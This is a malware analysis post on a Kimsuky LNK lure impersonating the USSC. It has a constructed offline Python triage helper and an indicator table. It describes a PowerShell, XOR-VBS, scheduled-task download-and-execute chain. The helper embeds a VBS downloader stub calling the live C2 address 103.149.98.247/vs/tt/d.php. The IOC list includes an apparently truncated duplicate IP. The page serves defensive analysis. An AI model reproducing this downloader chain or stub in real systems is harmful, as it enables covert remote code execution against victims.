Beware of Kimsuky (김수키) malware! Malware impersonating the USSC research center discovered – attack disguised as a Korea-Australia-Japan cooperation dialogue (2025.4.16)
2025-05-06 • Sakai
A Kimsuky-attributed LNK file impersonates the United States Studies Centre (USSC) and a Track 1.5 Australia-Korea-Japan dialogue on future-oriented cooperation. The shortcut carries a Chrome icon so it looks benign, and its command line locates powershell.exe, identifies its own file on disk by searching for an LNK of the same byte size, extracts and opens an embedded PDF decoy, then XOR-decodes an embedded VBS payload and writes it to the Public Videos directory. It registers a scheduled task named authentication_up that runs the VBS every 18 minutes. The VBS downloads a file from 103.149.98.247 under /vs/tt/d.php, saves it with a .bat extension, executes it hidden, and deletes it afterwards: a staged downloader chain, with the lure content pointing at policy, diplomacy, or regional-security targets.
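The following triage helper is an added example written for this page, not code from the original post or from the sample itself. It reproduces the two extraction steps the summary describes (carving the embedded PDF decoy and XOR-decoding the VBS stage) against a constructed LNK-shaped byte string. Because the real sample's XOR key and payload offsets are not given on the page, the helper assumes a single-byte XOR key and a layout with the PDF before the VBS, and brute-forces the key by scoring candidate plaintexts for VBScript keywords; the real LNK instead reads its payloads at fixed offsets after finding itself by file size. The `103.149.98.247/vs/tt/d.php` string in the constructed VBS is the indicator from the page; nothing here touches the network.

```python
"""Offline triage helper for a Kimsuky-style LNK with embedded PDF decoy and XOR'd VBS.

Constructed example (not the page's sample). Assumptions: the VBS stage is
encoded with a single-byte XOR key and sits after the PDF decoy in the file.
"""
import re
from typing import Optional, Tuple

# --- constructed sample data: a tiny decoy PDF and a VBS downloader stub ---
DECOY_PDF = (
    b"%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
    b"trailer<</Root 1 0 R>>\n%%EOF"
)
VBS_STAGE = (
    b'Set http = CreateObject("MSXML2.ServerXMLHTTP")\r\n'
    b'http.Open "GET", "http://103.149.98.247/vs/tt/d.php", False\r\n'
    b"http.Send\r\n"
    b'Set sh = CreateObject("WScript.Shell")\r\n'
)
SAMPLE_XOR_KEY = 0x5A  # key chosen for the constructed sample only


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a single-byte key (symmetric, so it also decodes)."""
    return bytes(b ^ key for b in data)


# LNK-looking prefix: HeaderSize 0x4C, ShellLinkHeader CLSID, zero filler,
# then the decoy PDF followed by the XOR-encoded VBS stage.
SAMPLE_LNK = (
    b"\x4c\x00\x00\x00"
    + b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
    + b"\x00" * 300
    + DECOY_PDF
    + xor_bytes(VBS_STAGE, SAMPLE_XOR_KEY)
)

VBS_MARKERS = [b"CreateObject", b"WScript", b"Set ", b"Execute", b".Run"]
IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(rb"https?://[^\s\"']+")


def carve_pdf(blob: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (end_offset, pdf_bytes) for the %PDF- ... last %%EOF region, if present."""
    start = blob.find(b"%PDF-")
    if start < 0:
        return None
    eof = blob.rfind(b"%%EOF")
    if eof < start:
        return None
    end = eof + len(b"%%EOF")
    return end, blob[start:end]


def recover_xor_vbs(tail: bytes) -> Optional[Tuple[int, bytes]]:
    """Try all 256 single-byte keys; keep the one whose output has the most VBScript markers."""
    best_key, best_score, best_text = None, 0, b""
    for key in range(256):
        cand = xor_bytes(tail, key)
        score = sum(cand.count(m) for m in VBS_MARKERS)
        if score > best_score:
            best_key, best_score, best_text = key, score, cand
    if best_key is None:  # no key produced anything script-like
        return None
    return best_key, best_text


def triage(blob: bytes) -> dict:
    """Carve the decoy, decode the VBS stage, and list network indicators found in it."""
    carved = carve_pdf(blob)
    if carved is None:
        raise ValueError("no embedded PDF decoy found")
    pdf_end, pdf = carved
    decoded = recover_xor_vbs(blob[pdf_end:])
    if decoded is None:
        raise ValueError("no XOR key produced VBScript-like text")
    key, vbs = decoded
    return {
        "pdf_size": len(pdf),
        "xor_key": key,
        "vbs": vbs.decode("latin-1"),
        "ips": sorted({m.decode() for m in IPV4_RE.findall(vbs)}),
        "urls": sorted({m.decode() for m in URL_RE.findall(vbs)}),
    }


if __name__ == "__main__":
    r = triage(SAMPLE_LNK)
    print(f"decoy PDF: {r['pdf_size']} bytes, XOR key: 0x{r['xor_key']:02x}")
    print("indicators:", r["ips"], r["urls"])
```

Run it as-is to see the constructed sample decoded; to use it on a real file, replace `SAMPLE_LNK` with the file's bytes and expect to adjust `recover_xor_vbs` if the sample uses a multi-byte key, since keyword scoring only resolves a single-byte XOR.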
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 89a725b08ab0e8885fc03b543638be96 | 2025-04-18 | 2025-07-01 |
| IPv4 | 103.149.98.247 | 2025-04-18 | 2025-07-01 |
| IPv4 | 3.149.98.247 | 2025-05-06 | 2025-05-06 |
| HASH | 20443f517f22b292d63e7e06d9713b7… | 2025-04-18 | 2025-05-06 |
| HASH | 42f306b905ece8875bdf16d276b8e4c… | 2025-04-18 | 2025-05-06 |